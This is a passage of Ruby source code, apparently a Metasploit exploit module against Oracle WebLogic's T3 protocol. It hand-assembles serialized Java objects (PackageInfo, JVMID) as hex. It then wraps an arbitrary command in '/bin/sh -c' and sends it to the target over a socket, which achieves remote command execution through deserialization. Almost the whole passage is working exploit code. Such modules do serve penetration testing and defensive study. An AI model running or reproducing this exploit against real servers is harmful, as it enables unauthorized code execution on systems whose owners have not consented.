    request_obj << '2f537472696e673b'

692
    request_obj << '5b0012' # Field type: Array, field name length: 18

693
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes

694
    request_obj << '6f41734279746573'

695
    request_obj << '740002' # String, length: 2

696
    request_obj << '5b42' # [B

697
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

698
    request_obj << '0024' # Class name length: 36

699
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo

700
    request_obj << '6f6d6d6f6e2e696e7465'

701
    request_obj << '726e616c2e5061636b61'

702
    request_obj << '6765496e666f'

703
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID

704
    request_obj << '020009' # Serializable, 9 fields

705
    request_obj << '490005' # Field type: Int, field name length: 5

706
    request_obj << '6d616a6f72' # major

707
    request_obj << '490005' # Field type: Int, field name length: 5

708
    request_obj << '6d696e6f72' # minor

709
    request_obj << '49000b' # Field type: Int, field name length: 11

710
    request_obj << '70617463685570646174' # patchUpdate

711
    request_obj << '65'

712
    request_obj << '49000c' # Field type: Int, field name length: 12

713
    request_obj << '726f6c6c696e67506174' # rollingPatch

714
    request_obj << '6368'

715
    request_obj << '49000b' # Field type: Int, field name length: 11

716
    request_obj << '73657276696365506163' # servicePack

717
    request_obj << '6b'

718
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

719
    request_obj << '74656d706f7261727950' # temporaryPatch

720
    request_obj << '61746368'

721
    request_obj << '4c0009' # Field type: Object, field name length: 9

722
    request_obj << '696d706c5469746c65' # implTitle

723
    request_obj << '71007e0005' # TC_REFERENCE, handle

724
    request_obj << '4c000a' # Field type: Object, field name length: 10

725
    request_obj << '696d706c56656e646f72' # implVendor

726
    request_obj << '71007e0005' # TC_REFERENCE, handle

727
    request_obj << '4c000b' # Field type: Object, field name length: 11

728
    request_obj << '696d706c56657273696f' # implVersion

729
    request_obj << '6e'

730
    request_obj << '71007e0005' # TC_REFERENCE, handle

731
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

732
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA

733
    request_obj << 'fe00ff' # separator

734
    request_obj << 'fe010000'

735
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

736
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

737
    request_obj << '0013' # Class name length: 19

738
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID

739
    request_obj << '6a766d2e4a564d4944'

740
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID

741
    request_obj << '0c0000'

742
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA

743
    request_obj << '4621'

744
    request_obj << '000000000000000000'

745
    request_obj << '09' # length: 9

746
    request_obj << '3132372e302e312e31' # 127.0.1.1

747
    request_obj << '000b' # length: 11

748
    request_obj << '75732d6c2d627265656e' # us-l-breens

749
    request_obj << '73'

750
    request_obj << 'a53caff10000000700'

751
    request_obj << '001b59'

752
    request_obj << 'ffffffffffffffffffff'

753
    request_obj << 'ffffffffffffffffffff'

754
    request_obj << 'ffffffff'

755
    request_obj << '0078'

756
    request_obj << 'fe010000' # separator

757
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

758
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

759
    request_obj << '0013' # Class name length: 19

760
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID

761
    request_obj << '6a766d2e4a564d4944'

762
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID

763
    request_obj << '0c0000'

764
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA

765
    request_obj << '1d0181401281'

766
    request_obj << '34bf427600093132372e'

767
    request_obj << '302e312e31a53caff1'

768
    request_obj << '000000000078'

769


770
    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')

771
    request_obj[0, 8] = new_len

772


773
    sock.put([request_obj].pack('H*'))

774
    sleep(1)

775
  end

776


777
  def format_payload(payload_cmd)

778
    print_status('Formatting payload...')

779
    payload_arr = payload_cmd.split(' ', 3)

780


781
    formatted_payload = ''

782
    payload_arr.each do |part|

783
      formatted_payload << '74' # denotes a string

784
      formatted_payload << part.length.to_s(16).rjust(4, '0')

785
      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join

786
    end

787


788
    formatted_payload

789
  end

790


791
  def execute_command(cmd, _opts = {})

792
    cmd.prepend('/bin/sh -c ')

793
    cmd = build_payload_obj(cmd)

794


795
    t3_send(cmd)

796
  end

797
end

798


799